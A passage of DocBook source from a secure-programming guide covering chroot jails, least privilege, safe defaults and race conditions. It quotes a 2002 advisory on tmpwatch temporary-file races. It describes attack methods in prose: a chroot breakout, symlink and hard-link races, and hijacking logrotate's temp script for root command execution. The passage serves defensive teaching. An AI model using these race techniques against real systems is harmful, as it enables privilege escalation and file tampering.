have such abilities at this time; this may change in the near future.
For more about Java, see <xref linkend="java">.
</para>

</sect2>

<sect2 id="consider-fsuid">
<title>Consider Using FSUID To Limit Privileges</title>

<para>
Each Linux process has two Linux-unique state values called
filesystem user id (FSUID) and filesystem group id (FSGID).
These values are used when checking against the filesystem permissions.
If you're building a program that operates as a file server for arbitrary
users (like an NFS server), you might consider using these Linux extensions.
To use them, while holding root privileges change
just FSUID and FSGID before accessing files on behalf of a normal user.
This extension is fairly useful, and provides a mechanism for limiting
filesystem access rights without removing other (possibly necessary) rights.
By only setting the FSUID (and not the EUID), a local user cannot send
a signal to the process.
Also, avoiding race conditions is much easier in this situation.
However, a disadvantage of this approach
is that these calls are not portable to other Unix-like systems.
</para>

</sect2>

<sect2 id="consider-chroot">
<title>Consider Using Chroot to Minimize Available Files</title>

<para>
You can use chroot(2) to limit the files visible to your program.
This requires carefully setting up a directory (called the ``chroot jail'')
and correctly entering it.
This can be a fairly effective technique for improving a program's
security - it's hard to interfere with files you can't see.
However, it depends on a whole bunch of assumptions, in particular,
the program must lack root privileges, it must not have any way to get
root privileges, and the chroot jail must be properly set up
(e.g., be careful what you put inside the chroot jail, and make sure that
users can never control its contents before calling chroot).
I recommend using chroot(2) where it makes sense to do so, but don't depend
on it alone; instead, make it part of a layered set of defenses.
Here are a few notes about the use of chroot(2):

<itemizedlist>
<listitem>

<para>
The program can still use non-filesystem objects that are shared
across the entire machine
(such as System V IPC objects and network sockets).
It's best to also
use separate pseudo-users and/or groups, because all Unix-like systems include
the ability to isolate users; this will at least limit the damage
a subverted program can do to other programs.
Note that current most Unix-like systems (including Linux)
won't isolate intentionally cooperating programs; if you're worried about
malicious programs cooperating, you need to get a system that implements
some sort of mandatory access control and/or limits covert channels.
</para>
</listitem>
<listitem>

<para>
Be sure to close any filesystem descriptors to outside files if you
don't want them used later.
In particular, don't have any descriptors open to directories outside
the chroot jail, or set up a situation where such a descriptor could be
given to it (e.g., via Unix sockets or an old implementation of /proc).
If the program is given a descriptor to a directory outside the chroot jail,
it could be used to escape out of the chroot jail.
</para>
</listitem>
<listitem>

<para>
The chroot jail has to be set up to be secure - it must never be
controlled by a user and every file added must be carefully examined.
Don't use a normal user's home directory, subdirectory, or
other directory that can ever be controlled by a user as a chroot jail;
use a separate directory specially set aside
for the purpose.
<!-- http://msgs.securepoint.com/cgi-bin/get/bugtraq0004/64/1/1/2.html -->
<!--
http://marc.theaimsgroup.com/?l=qmail&m=100128344722211&w=2
-->
Using a directory controlled by a user is a disaster - for example,
the user could create a ``lib'' directory containing a trojaned linker or libc
(and could link a setuid root binary into that space, if the files you
save don't use it).
Place the absolute minimum number of files and directories there.
Typically you'll have a /bin, /etc/, /lib, and maybe one or two others
(e.g., /pub if it's an ftp server).
Place in /bin only what you need to run after doing the chroot(); sometimes
you need nothing at all (try to avoid placing a shell like /bin/sh
there, though sometimes that can't be helped).
You may need a /etc/passwd and /etc/group so file listings can show
some correct names, but if so, try not to include the real system's
values, and certainly replace all passwords with "*".
</para>

<para>
In /lib, place only what you need; use ldd(1) to query each program in /bin
to find out what it needs, and only include them.
On Linux, you'll probably need a few basic libraries like ld-linux.so.2, and
not much else.
Alternatively, recompile any necessary programs to be statically linked,
so that they
don't need dynamically loaded libraries at all.
</para>

<para>
It's usually wiser to completely copy in all files, instead of making
hard links; while this wastes some time and disk space, it makes it so that
attacks on the chroot jail files do not automatically propagate into the
regular system's files.
Mounting a /proc filesystem, on systems where this is supported, is
generally unwise. In fact, in very old versions of Linux (versions 2.0.x,
at least up through 2.0.38) it's a
known security flaw, since there are pseudo-directories in /proc that
would permit a chroot'ed program to escape.
Linux kernel 2.2 fixed this known problem, but there may be others; if
possible, don't do it.
</para>

</listitem>
<listitem>

<para>
Chroot really isn't effective if
the program can acquire root privilege.
For example, the program could use calls like mknod(2) to create a device
file that can view physical memory, and then use the resulting
device file to modify kernel memory to give itself
whatever privileges it desired.
Another example of how a root program can break out of chroot
is demonstrated at
<ulink
url="http://www.suid.edu/source/breakchroot.c">http://www.suid.edu/source/breakchroot.c</ulink>.
In this example, the program opens a file descriptor for
the current directory, creates and chroots into a subdirectory, sets
the current directory to the previously-opened current directory,
repeatedly cd's up from the current directory (which since it is
outside the current chroot succeeds in moving up to the real filesystem
root), and then calls chroot on the result.
By the time you read this, these weaknesses may have been plugged,
but the reality is that root privilege has traditionally meant ``all
privileges'' and it's hard to strip them away.
It's better to assume that a program requiring continuous root privileges
will only be mildly helped using chroot().
Of course, you may be able to break your program into parts, so that
at least part of it can be in a chroot jail.
</para>
</listitem>

</itemizedlist>

</para>

</sect2>
<sect2 id="minimize-accessible-data">
<title>Consider Minimizing the Accessible Data</title>

<para>
Consider minimizing the amount of data that can be accessed by the user.
For example, in CGI scripts, place all data used by the CGI script
outside of the document tree unless there is a reason the user needs to
see the data directly.
Some people have the false notion that, by not publicly providing a
link, no one can access the data, but this is simply not true.
</para>

</sect2>

<sect2 id="minimize-resources">
<title>Consider Minimizing the Resources Available</title>
<para>
Consider minimizing the computer resources available to a given
process so that, even if it ``goes haywire,'' its damage can be limited.
This is a fundamental technique for preventing a denial of service.
For network servers,
a common approach is to set up a separate process for each session,
and for each process limit the amount of CPU time (et cetera) that session
can use.
That way, if an attacker makes a request that chews up memory or uses
100% of the CPU, the limits will kick in and prevent that single session
from interfering with other tasks.
Of course, an attacker can establish many sessions, but this at least
raises the bar for an attack.
See <xref linkend="quotas"> for more information on how to set these limits
(e.g., ulimit(1)).
</para>
</sect2>

</sect1>

<sect1 id="minimize-functionality">
<title>Minimize the Functionality of a Component</title>
<para>
In a related move, minimize the amount of functionality provided by
your component.
If it does several functions, consider breaking its implementation up into
those smaller functions.
That way, users who don't need some functions can disable just those portions.
This is particularly important when a flaw is discovered - this way, users
can disable just one component and still use the other parts.
</para>
</sect1>

<sect1 id="avoid-setuid">
<title>Avoid Creating Setuid/Setgid Scripts</title>
<para>
Many Unix-like systems, in particular Linux, simply ignore the
setuid and setgid bits on scripts to avoid the race condition
described earlier.
Since support for setuid scripts varies on Unix-like systems,
they're best avoided in new applications where possible.
As a special case, Perl includes a special setup to support setuid Perl
scripts, so using setuid and setgid is acceptable in Perl if you
truly need this kind of functionality.
If you need to support this kind of functionality in your own
interpreter, examine how Perl does this.
Otherwise, a simple approach is to ``wrap'' the script with a small
setuid/setgid executable that creates a safe environment
(e.g., clears and sets environment variables) and then
calls the script (using the script's full path).
Make sure that the script cannot be changed by an attacker!
Shell scripting languages have additional problems, and really should
not be setuid/setgid; see <xref linkend="shell">
for more information about this.
</para>
</sect1>

<sect1 id="safe-configure">
<title>Configure Safely and Use Safe Defaults</title>

<para>
Configuration is considered to currently be the number one security problem.
Therefore, you should spend some effort to (1) make the initial installation
secure, and (2) make it easy to reconfigure the system while keeping it secure.
</para>

<para>
Never have the installation routines install a working ``default'' password.
If you need to install new ``users'', that's fine - just set them up with
an impossible password, leaving time for administrators to set the password
(and leaving the system secure before the password is set).
Administrators will probably install hundreds of packages and almost
certainly forget to set the password - it's likely they won't even know
to set it, if you create a default password.
<!-- This has hurt many a system, for example,
Red Hat did this with the ``piranha'' package (it was widely denounced
in April 1999), and Microsoft did this with SQL Server 7.0 when running
in ``mixed mode''. -->
<!-- http://slashdot.org/articles/00/08/21/0759251.shtml,
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%3D1%26date%3D2000-08-15%26msg%3DB9D1827FDF66D111925800805F3102E31E7AAB6E%40RED-MSG-57 -->
</para>

<para>
A program should have the most restrictive access policy
until the administrator has a chance to configure it.
Please don't create ``sample'' working users or
``allow access to all'' configurations as the starting configuration;
many users just ``install everything'' (installing all available services)
and never get around to configuring many services.
In some cases the program may be able to determine that a more generous
policy is reasonable by depending on the existing authentication system,
for example, an ftp server could legitimately determine that a user who
can log into a user's directory should be allowed to access that user's files.
Be careful with such assumptions, however.
</para>

<para>
Have installation scripts install a program as safely as possible.
By default, install all files as owned by root or some other
system user and make them unwriteable by others;
this prevents non-root users from installing viruses.
Indeed, it's best to make them unreadable by all but the trusted user.
Allow non-root installation where possible as well, so that users without
root privileges and administrators who do not fully trust the
installer can still use the program.
</para>

<para>
When installing, check to make sure that any assumptions necessary for
security are true.
Some library routines are not safe on some platforms; see the discussion of
this in <xref linkend="call-only-safe">.
If you know which platforms your application will run on, you need not
check their specific attributes, but in that case you should
check to make sure that the program is being installed on only one of
those platforms.
Otherwise, you should require a manual override to install the program,
because you don't know if the result will be secure.
</para>

<para>
Try to make configuration as easy and clear as possible, including
post-installation configuration.
Make using the ``secure'' approach as easy as possible, or many users
will use an insecure approach without understanding the risks.
On Linux,
take advantage of tools like linuxconf, so that users can easily configure
their system using an existing infrastructure.
</para>

<para>
If there's a configuration language, the default should be to deny access
until the user specifically grants it.
Include many clear comments in the sample configuration file, if there is one,
so the administrator understands what the configuration does.
</para>

</sect1>


<sect1 id="init-safe">
<title>Load Initialization Values Safely</title>

<para>
Many programs read an initialization file to allow their defaults to be
configured.
You must ensure that an attacker can't change which initialization file
is used, nor create or modify that file.
Often you should <emphasis>not</emphasis> use the current directory
as a source of this information, since if the program is used as an
editor or browser, the user may be viewing the directory controlled
by someone else.
<!-- Joe had this problem: http://lwn.net/2001/0301/a/sec-joe.php3 -->
Instead, if the program is a typical user application, you should load
any user defaults from a hidden file or directory contained in the user's
home directory.
If the program is setuid/setgid, don't read any file controlled by the
user unless you carefully filter it as an untrusted (potentially
hostile) input.
Trusted configuration values should be loaded from somewhere else
entirely (typically from a file in /etc).
</para>
</sect1>


<sect1 id="fail-safe">
<title>Fail Safe</title>

<para>
A secure program should always ``fail safe'', that is,
it should be designed so that if the program does fail, the safest
result should occur.
For security-critical programs, that usually means that
if some sort of misbehavior is detected (malformed input,
reaching a ``can't get here'' state, and so on), then the program
should immediately deny service and stop processing that request.
Don't try to ``figure out what the user wanted'': just deny the service.
Sometimes this can decrease reliability or useability
(from a user's perspective), but it increases security.
There are a few cases where this might not be desired (e.g., where denial of
service is much worse than loss of confidentiality or integrity), but
such cases are quite rare.
</para>

<para>
Note that I recommend ``stop processing the request'', not ``fail altogether''.
In particular, most servers should not completely halt when given malformed
input, because that creates a trivial opportunity for a denial of service
attack (the attacker just sends garbage bits to prevent you from using the
service).
Sometimes taking the whole server down is necessary, in particular,
reaching some ``can't get here'' states may signal a problem so drastic
that continuing is unwise.
</para>

<para>
Consider carefully what error message you send back when a failure is detected.
if you send nothing
back, it may be hard to diagnose problems, but sending back too much
information may unintentionally aid an attacker.
Usually the best approach is to reply with ``access denied'' or
``miscellaneous error encountered'' and then
write more detailed information to an audit log (where you can have more
control over who sees the information).
</para>

</sect1>

<sect1 id="avoid-race">
<title>Avoid Race Conditions</title>

<para>
A ``race condition'' can be defined as
``Anomalous behavior due to unexpected critical dependence
on the relative timing of events''
[FOLDOC].
Race conditions generally involve one or more processes
accessing a shared resource (such a file or variable), where this
multiple access has not been properly controlled.
</para>

<para>
In general, processes do not execute atomically;
another process may interrupt it between essentially any two instructions.
If a secure program's process is not prepared for these interruptions,
another process may be able to interfere with the secure program's process.
Any pair of operations in a secure program must still work correctly
if arbitrary amounts of another process's code is executed between them.
</para>

<para>
Race condition problems can be notionally divided into two categories:
<itemizedlist>
<listitem><para>
Interference caused by untrusted processes.
Some security taxonomies call this problem a
``sequence'' or ``non-atomic'' condition.
These are conditions caused by processes running other, different programs,
which ``slip in'' other actions between steps of the secure program.
These other programs might be invoked by an attacker specifically
to cause the problem.
This book will call these sequencing problems.
</para></listitem>
<listitem><para>
Interference caused by trusted processes (from the secure program's
point of view).
Some taxonomies call these deadlock, livelock, or locking failure conditions.
These are conditions caused by processes running the ``same'' program.
Since these different processes may have the ``same'' privileges, if
not properly controlled they may be able to interfere with each other in
a way other programs can't.
Sometimes this kind of interference can be exploited.
This book will call these locking problems.
</para></listitem>
</itemizedlist>
</para>


<!-- http://webreview.com/wr/pub/97/08/08/bookshelf  Suggested
     this kind of division:

Sequence conditions: Be aware that your program does not
execute atomatically. That is, the program can be interrupted
between any two operations to let another program run for a
while-including one that is trying to abuse yours. Thus, check
your code carefully for any pair of operations that might fail if
arbitrary code is executed between them.

 Deadlock conditions: Remember, more than one copy of your
program may be running at the same time. Use file locking for
any files that you modify.
Provide a way to recover the locks in
the event that the program crashes while a lock is held. Avoid
deadlocks or "deadly embraces," which can occur when one
program attempts to lock file A and then file B, while another
program already holds a lock for file B and then attempts to
lock file A.
-->

<sect2 id="non-atomic">
<title>Sequencing (Non-Atomic) Problems</title>

<para>
In general,
you must check your code for any pair of operations that might fail if
arbitrary code is executed between them.
</para>

<para>
Note that loading and saving a shared variable are usually implemented
as separate operations and are not atomic.
This means that an ``increment variable'' operation is usually converted into
loading, incrementing, and saving operation, so if the variable memory
is shared the other process may interfere with the incrementing.
</para>

<para>
<!-- ??? Extend this. -->
Secure programs must determine if a request should be granted, and if
so, act on that request.
There must be no way for an untrusted user to change anything used in
this determination before the program acts on it.
This kind of race condition is sometimes termed a
``time of check - time of use'' (TOCTOU) race condition.
</para>

<sect3 id="atomic-filesystem">
<title>Atomic Actions in the Filesystem</title>

<para>
The problem of failing to perform atomic actions
repeatedly comes up in the filesystem.
In general, the filesystem is a shared resource used by many programs,
and some programs may interfere with its use by other programs.
Secure programs should generally avoid using access(2) to determine
if a request should be granted, followed later by open(2), because users
may be able to move files around between these calls, possibly creating
symbolic links or files of their own choosing instead.
A secure program should instead set its effective id or filesystem id,
then make the open call directly.
It's possible to use access(2) securely, but only when a user cannot affect
the file or any directory along its path from the filesystem root.
</para>

<para>
When creating a file, you should
open it using the modes O_CREAT | O_EXCL and grant only
very narrow permissions (only to the current user);
you'll also need to prepare for having the open fail.
If you need to be able to open the file (e.g,. to prevent a
denial-of-service), you'll need to repetitively
(1) create a ``random'' filename, (2) open the file as noted,
and (3) stop repeating when the open succeeds.
</para>

<para>
Ordinary programs can become security weaknesses if they
don't create files properly.
For example, the ``joe'' text editor had a weakness called the
``DEADJOE'' symlink vulnerability.
When joe was exited in a nonstandard way (such as a system crash, closing an
xterm, or a network connection going down), joe would unconditionally append
its open buffers to the file "DEADJOE".
This could be exploited by the
creation of DEADJOE symlinks in directories where root would normally use joe.
In this way, joe could be used to append garbage to
potentially-sensitive files, resulting in a denial of service and/or
unintentional access.
<!-- This joe issue was noted in various places in the year 2000;
 the note is from the Red Hat vulnerability summary. -->
</para>

<!-- From http://java.sun.com/security/seccodeguide.html:
In the same vein, it's often better to use fchmod() and
fchown() instead of chmod(), chown(), and chgrp().
If you close a file and then use chmod() to change the permissions, and
the file or a directory in the directory's path is writeable by another,
an attacker may be able to remove the file and create a symbolic link
to another file (say /etc/passwd, to add/remove interesting values, or
to /dev/zero, to provide an infinitely-long data stream of input to
your program).

From http://webreview.com/wr/pub/97/08/08/bookshelf:
In particular, when you are performing a series of operations on a
file, such as changing its owner, stat ing the file, or changing its
mode, first open the file and then use the fchown( ), fstat( ), or
fchmod( ) system calls. Doing so will prevent the file from being
replaced while your program is running (a possible race condition).
Also avoid the use of the access( ) function to determine your ability
to access a file: using the access( ) function followed by an open( ) is
a race condition, and almost always a bug.
-->

<para>
As another example, when performing a series of operations on a file's
meta-information (such as changing its owner, stat-ing the file, or
changing its permission bits), first open the file and then use the
operations on open files.
This means use the fchown( ), fstat( ), or fchmod( ) system calls,
instead of the functions taking filenames
such as chown(), chgrp(), and chmod().
Doing so will prevent the file from being
replaced while your program is running (a possible race condition).
For example, if you close a file and then use chmod()
to change its permissions,
an attacker may be able to move or remove the file between those
two steps and create a symbolic link to another file
(say /etc/passwd).
Other interesting files include /dev/zero, which can
provide an infinitely-long data stream of input to a program; if an
attacker can ``switch'' the file midstream, the results can be dangerous.
<!-- Based on http://java.sun.com/security/seccodeguide.html and
     http://webreview.com/wr/pub/97/08/08/bookshelf: -->
</para>

<para>
But even this gets complicated - when creating files, you must give
them as a minimal set of rights as possible, and then change the
rights to be more expansive if you desire.
Generally, this means you need to use umask and/or open's parameters to
limit initial access to just the user and user group.
For example, if you create a file that is initially world-readable, then
try to turn off the ``world readable'' bit, an attacker could try to
open the file while the permission bits said this was okay.
On most Unix-like systems, permissions are only checked on open, so
this would result in an attacker having more privileges than intended.
</para>

<para>
In general, if multiple users can write to a directory in a Unix-like
system, you'd better have the ``sticky'' bit set on that directory,
and sticky directories had better be implemented.
It's much better to completely avoid the problem, however, and create
directories that only a trusted special process can access
(and then implement that carefully).
The traditional Unix temporary directories (/tmp and /var/tmp) are usually
implemented as ``sticky'' directories, and all sorts of security problems
can still surface, as we'll see next.
</para>

</sect3>

<sect3 id="temporary-files">
<title>Temporary Files</title>

<para>
This issue of correctly performing atomic operations
particularly comes up when creating temporary files.
Temporary files in Unix-like systems are traditionally
created in the /tmp or /var/tmp directories,
which are shared by all users.
A common trick by attackers is to create symbolic links in the
temporary directory to some other file (e.g., /etc/passwd)
while your secure program is running.
The attacker's goal is to create
a situation where the secure program determines that
a given filename doesn't exist, the attacker then creates the symbolic
link to another file, and then the secure program performs some operation
(but now it actually opened an unintended file).
Often important files can be clobbered or modified this way.
There are many variations to this attack, such as creating normal files,
all based on the
idea that the attacker can create (or sometimes
otherwise access) file system objects
in the same directory used by the secure program for temporary files.
</para>

<para>
Michal Zalewski exposed in 2002 another serious problem with
temporary directories involving automatic cleaning of temporary directories.
For more information, see his
posting to Bugtraq dated December 20, 2002,
(subject "[RAZOR] Problems with mkstemp()").
Basically, Zalewski notes that
it's a common practice to have a program automatically sweep
temporary directories like /tmp and /var/tmp and remove "old" files
that have not been accessed for a while (e.g., several days).
Such programs are sometimes called "tmp cleaners" (pronounced "temp cleaners").
Possibly the most common tmp cleaner is "tmpwatch" by
Erik Troan and Preston Brown of Red Hat Software;
another common one is 'stmpclean' by Stanislav Shalunov;
many administrators roll their own as well.
Unfortunately, the existance of tmp cleaners creates an opportunity
for new security-critical race conditions;
an attacker may be able to arrange things so that the tmp cleaner
interferes with the secure program.
For example, an attacker could create an "old" file, arrange for
the tmp cleaner to plan to delete the file, delete the file himself,
and run a secure program that creates the same file - now the tmp cleaner
will delete the secure program's file!
Or, imagine that a secure program can have long delays after using the file
(e.g., a setuid program stopped with SIGSTOP and
resumed after many days with SIGCONT, or simply intentionally creating
a lot of work).
If the temporary file isn't used for long enough,
its temporary files are likely to be
removed by the tmp cleaner.
</para>
<!--
Date:  Sun, 22 Dec 2002 01:57:27 -0800 (PST)
From: "Michal Zalewski" lcamtuf, at, coredump dot cx
Subject: [RAZOR] Problems with mkstemp() (fwd)


Dave,

Thought you might be interested. I think there are some things you
might want to look at in the /tmp-related section of your FAQ (apologies if
you already got this).

Date: Fri, 20 Dec 2002 09:30:30 -0800 (PST)
From: Michal Zalewski <lcamtuf@ghettot.org>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
     full-disclosure@netsys.com
Cc: secprog@securityfocus.com
Subject: [RAZOR] Problems with mkstemp()


  Common use of 'tmpwatch' utility and its counterparts triggers race
  conditions in many applications

  Michal Zalewski <lcamtuf@razor.bindview.com>, 12/05/2002
  Copyright (C) 2002 by Bindview Corporation


1) Scope and exposure info
=====

  A common practice of installing 'tmpwatch' utility or similar
software
  configured to sweep the /tmp directory on Linux and unix systems can
  compromise secure temporary file creation mechanisms in certain
applications,
  creating a potential privilege escalation scenario. This document
briefly
  discusses the exposure, providing some examples, and suggesting
possible
  workarounds.

  It is believed that many unix operating systems using 'tmpwatch' or
an
  equivalent are affected. Numerous Linux systems, such as Red Hat,
that ship
  with cron daemon running and 'tmpwatch' configured to sweep /tmp are
  susceptible to the attack.


2) Application details
=====

  'Tmpwatch' is a handy utility that removes files which haven't been
  accessed for a period of time. It was developed by Erik Troan and
  Preston Brown of Red Hat Software, and, with time, has become a
  component of many Linux distributions, also ported to platforms
  such as Solaris, *BSD or HP/UX. By default, it is installed with a
  crontab entry that sweeps /tmp directory on a daily basis, deleting
  files that have not been accessed for the past few days.

  An alternative program, called 'stmpclean' and authored by Stanislav
  Shalunov, is shipped with *BSD systems and some Linux distributions
  to perform the same task, and some administrators deploy other tools
or
  scripts for this purpose.


3) Vulnerability details
=====

  Numerous applications rely either on mkstemp() or custom O_EXCL file
  creation mechanisms to store temporary data in the /tmp directory
  in a secure manner. Of those, certain programs run with elevated
  privileges, or simply at a different privilege level than the caller.

  The exposure is a result of a common misconception, promoted by
almost
  all secure programming tutorials and manpages, that /tmp files
created
  with mkstemp(), granted that umask() settings were proper, are
  safe against hijacking and common races. The file, since it is
created
  in a sticky-bit directory, indeed cannot be removed or replaced by
  the attacker running with different non-root privileges, but since
  many operating systems feature 'tmpwatch'-alike solutions, the only
  thing that can and should be considered safe in /tmp is the
descriptor
  returned by mkstemp() - the filename should not be relied upon. There
  are two major reasons for this:

  1) unlink() races

     It is very difficult to remove a file without risking a potential
     race (see section 4). 'Tmpwatch' does not take any extra measures
to
     prevent races, and probes file creation time using lstat(). Based
on this
     data, it calls unlink() as root. Problem is, on a multitasking
system, it
     is possible for the attacker to get some CPU time between those
two system
     calls, remove the old "decoy" file that has been probed with
lstat(), and
     let the application of his choice create its own temporary file
under this
     name. While mkstemp() names are guaranteed to be unique, they
shouldn't be
     expected to be unpredictable - in most implementations, the name
is a
     function of process ID and time - so it is possible for the
attacker to
     guess it and create a decoy in advance. Once the tmpwatch process
is
     resumed, the file is immediately removed, based on the result of
     earlier lstat() on the old, no longer existing file.

     While this three-component race requires very precise timing, it
     is possible to try a number of times in a single 'tmpwatch' run if
     enough decoy files are created by the attacker. Additionally,
since
     each step of the attack would result in a corresponding filesystem
     change, it is fairly easy to carefully measure timings and
     coordinate the attack.

     If the attacker cannot make the application run at the same time
     as 'tmpwatch' - for example, if the application is executed by
     hand by the administrator, or is running from cron - 'tmpwatch'
     itself can be artificially delayed for almost an arbitrary amount
     of time by creating and continuously expending an elaborate
directory
     structure in /tmp using hard links (to preserve access times of
     files) and running other processes that demand disk access and
     cache space to slow down the process.

     'Stmpclean' offers additional protection against races by not
removing
     root-owned files and temporarily dropping privileges when removing
     the file to match the owner of lstat()ed resource. Unfortunately,
     not removing root files is a considerable drawback, and there is
still
     a potential for a race using carefully crafted hard links to a
file
     owned by the victim and two concurrent 'stmpclean' processes:

       - the attacker links /tmp/foo to ~victim/.bash_profile
       - tmpwatch #1 does lstat() on /tmp/foo and setuid victim
       - tmpwatch #2 does lstat() on /tmp/foo and setuid victim
       - tmpwatch #1 does unlink("/tmp/foo")
       - victim application creates /tmp/foo at uid==victim
       - tmpwatch #2 does unlink("/tmp/foo") and succeeds
       - the attacker creates /tmp/foo
       - victim application proceeds

     On certain systems such as Owl Linux, the attack will be not
possible
     due to hardlink limits imposed on sticky-bit directories.

  2) suspended processes and 'legitimate' file removal

     Here, all conventional measures that could be exercised by /tmp
cleaners
     fail miserably. A vulnerable application can be often delayed or
suspended
     after mkstemp() / open() - for example, a setuid program can be
     stopped with SIGSTOP and resumed with SIGCONT. If the application
is
     suspended for long enough, its temporary files are likely to be
     removed. This method requires much less precision, but is also
     more time-consuming and has a more limited scope (interactive
     applications only).

     Note that it is sometimes possible to delay the execution of
     a daemon - client wait, considerable I/O or CPU loads, and
subsequent
     mkstemp() calls can be all used to achieve the effect. The
     feasibility and efficiency is low, but the potential issue
     exists. Some client applications that are often left unattended
     and create temporary files - such as mail/news clients, web
     browsers, irc clients, etc - can also be used to compromise
     other accounts on the machine.

  Not all applications are prone to the problem just because mkstemp()
  is used to create files in /tmp; if the file name is not used to
perform
  any sensitive operations with some extra privileges afterward (read,
  write, chown, chmod, link/rename, etc), and only the descriptor is
  being used, the application is safe. This practice is often exercised
by
  programmers who want to avoid leaving dangling temporary files in
case
  the program is aborted or crashes. Similarly, if the application uses
  temporary files improperly, but does not rely on their contents and
does
  not attempt to access them with higher privileges, the application is
  secure in that regard.

  Applications that run with higher privileges and reopen their
  /tmp temporary files for reading or writing, call chown(), chmod() on
  them, rename or link the file to replace some sensitive information,
and
  so on, are exposed. It is worth mentioning that a popular 'mktemp'
  utility coming from OpenBSD passes only the filename to the
  caller shell script, thus rendering almost all scripts using it
  fundamentally flawed. If the script is being run as a cron job or
  other administrative task, and mktemp is used, the system can be
likely
  compromised by replacing the file after mktemp and prior to any write
  to the file. In the example quoted in the documentation for
mktemp(1):

    TMPFILE=`mktemp /tmp/$0.XXXXXX` || exit 1
    echo "program output" >> $TMPFILE

  ...the attacker would want to replace temporary file right before
  'echo', causing the text "program output" to be appended to a target
  file of his choice using symlinks or hardlinks; or, if it is more
  desirable, he'd spoof file contents to cause the program to
misbehave.

  Another example of the problem is a popular logrotate utility,
  coded - ironically - by Erik Troan, one of co-authors of 'tmpwatch'
  itself. The program suffered /tmp races in the past, but later
  switched to mkstemp(). The following sequence is used to handle
  post-rotation shell commands specified in config files:

  open("/tmp/logrotate.wvpNmP", O_WRONLY|O_CREAT|O_EXCL, 0700) = 6
  ...
  write(6, "#!/bin/sh\n\n", 11)     = 11
  write(6, "\n\t/bin/kill -HUP `cat /var/lock/"..., 79) = 79
  close(6)                          = 0
  ... fork, etc ...
  execve("/bin/sh", ["sh", "-c", "/bin/sh /tmp/logrotate.wvpNmP" ...

  Obviously, if the attacker can have /tmp/logrotate.* replaced in
  between mkstemp() (represented as open() syscall above) and the
  point where another process is spawned, a shell interpreter is
invoked,
  then executes another copy of the shell interpreter (apparent
  programmer's mistake) and finally reads the input file - which is
  a considerable chunk of time - the shell will be called with
  attacker-supplied commands to be executed with root privileges.

  On Red Hat, logrotate is executed from crontab on a daily basis, in
  a sequence before 'tmpwatch', and the easiest option for the attacker
  is to maintain a still-running tmpwatch process from the previous day
  to exploit the condition. On systems where those programs are not
  executed sequentially - for example, when both programs are listed
  directly in /etc/crontab - the attack requires less precision.


4) Workarounds and fixes:
=====

  Recommended immediate workaround is to discontinue the use of
'tmpwatch'
  or equivalent to sweep /tmp directory if this service is not
necessary.

  For applications that rely on TMPDIR or a similar environment
  variable, setting it to a separate, not publicly writable directory
  is often a viable solution. Note that not all applications honor
  this setting.

  In terms of a permanent solution, two different attack vectors have
  to be addressed, as discussed in section 3:

  1) unlink() race

     The proper way to remove files in sticky-bit directories while
     minimizing the risk is as follows:

       a) lstat() the file to be removed
       b) if owned by root, do not remove
       c) if st_nlink > 1, do not remove
       d) if owned by user, temporarily change privileges to this user
       e) attempt unlink()
       f) if failed, warn about a possible race condition
       g) switch privileges back to root

     With the exception of step c, this is implemented in 'stmpclean'.
     Unfortunately, step c is crucial on systems that do not have
     restricted /tmp kernel patches from Openwall
(http://www.openwall.com),
     otherwise, there is a potential for fooling the algorithm by
supplying
     a hard link to a file owned by the victim, as discussed in section
3.

     This approach has several drawbacks - such as the fact root-owned
files
     will not be removed. Other solution is to modify applications that
     generate filenames on their own, and to modify mkstemp(), to
generate
     names that are not only unique, but not feasible to predict.

     Another suggestion is to implement a funlink() capability in the
kernel
     of the operating system in question, to allow race-free file
removal,
     thus removing the non-root ownership requirement for the method
described
     above, and simplifying the approach. A skeleton patch to implement
     funlink() semantics and make sure the file being removed is the
file
     opened and fstat()ed previously is available at:
     http://lcamtuf.coredump.cx/soft/linux-2.4-funlink.diff (this and
     other patches are not endorsed by RAZOR in any way).

  2) suspended process and 'legitimate' file removal

     This issue is fairly difficult to address. The most basic idea is
     to use a special naming scheme for temporary files to avoid
deletion -
     unfortunately, this seems to defeat the purpose of using
tmpwatch-alike
     solutions in the first place.

     An alternative approach, which is to enforce separate temporary
     directories for certain applications, either process-, session- or
uid-
     based, is generally fairly controversial, and raises some
concerns.
     Advisory separation is generally acceptable, but there are a
number of
     applications that do not accept TMPDIR setting, and a widespread
practice
     of using /tmp in in-house applications. Mandatory separation
(kernel
     modification) raises compatibility concerns and is generally
approached
     with skepticism - no implementation has become particularly
popular.

  Ideally, implementators should carefully audit their sources. It is
  recommended for privileged applications to use private temporary
  directories for sensitive files, if possible; if using /tmp is
necessary,
  extra caution has to be exercised to avoid referencing the file by
name.
  Note that comparing the descriptor and a reopened file to verify
inode
  numbers, creation times or file ownership is not sufficient - please
refer
  to "Symlinks and Cryogenic Sleep" by Olaf Kirch, available at
  http://www.opennet.ru/base/audit/17.txt.html .

  It's worth noticing that 'tmpwatch' offers a -s option, which causes
the
  program to run the 'fuser' command to prevent removal of files that
are
  currently open. At first sight, this could be an effective way to
solve the
  problem. Unfortunately, this is not true, since many applications
close the
  file for a period of time before reopening (including logrotate and
  mktemp(1)).


5) Credits and thanks
=====

  Thanks to Solar Designer for interesting discussions on the subject,
  to Matt Power for useful feedback, and to RAZOR team in general for
making
  this publication possible.

-->

<para>
The general problem when creating files in these shared directories is that
you must guarantee that the filename you plan to use doesn't already
exist at time of creation, and atomically create the file.
Checking ``before'' you create the file doesn't work, because after the check
occurs, but before creation, another process can create that file with
that filename.
Using an ``unpredictable'' or ``unique'' filename doesn't work in
general, because another process can often repeatedly guess until it succeeds.
Once you create the file atomically, you must alway use the returned
file descriptor
(or file stream, if created from the file descriptor using routines
like fdopen()).
You must never re-open the file, or use any operations that use the
filename as a parameter - always use the file descriptor or
associated stream.
Otherwise, the tmpwatch race issues noted above will cause problems.
You can't even create the file, close it, and re-open it, even if the
permissions limit who can open it.
Note that comparing the descriptor and a reopened file to verify inode
numbers, creation times or file ownership is not sufficient - please refer
to "Symlinks and Cryogenic Sleep" by Olaf Kirch.
<!--
  http://www.opennet.ru/base/audit/17.txt.html .
-->
</para>

<para>
Fundamentally, to create a temporary file in a shared (sticky) directory,
you must repetitively: (1) create a ``random'' filename, (2) open it using
O_CREAT | O_EXCL and very narrow permissions (which atomically creates the
file and fails if it's not created),
and (3) stop repeating when the open succeeds.
</para>


<para>
According to the 1997 ``Single Unix Specification'', the preferred
method for creating an arbitrary temporary file
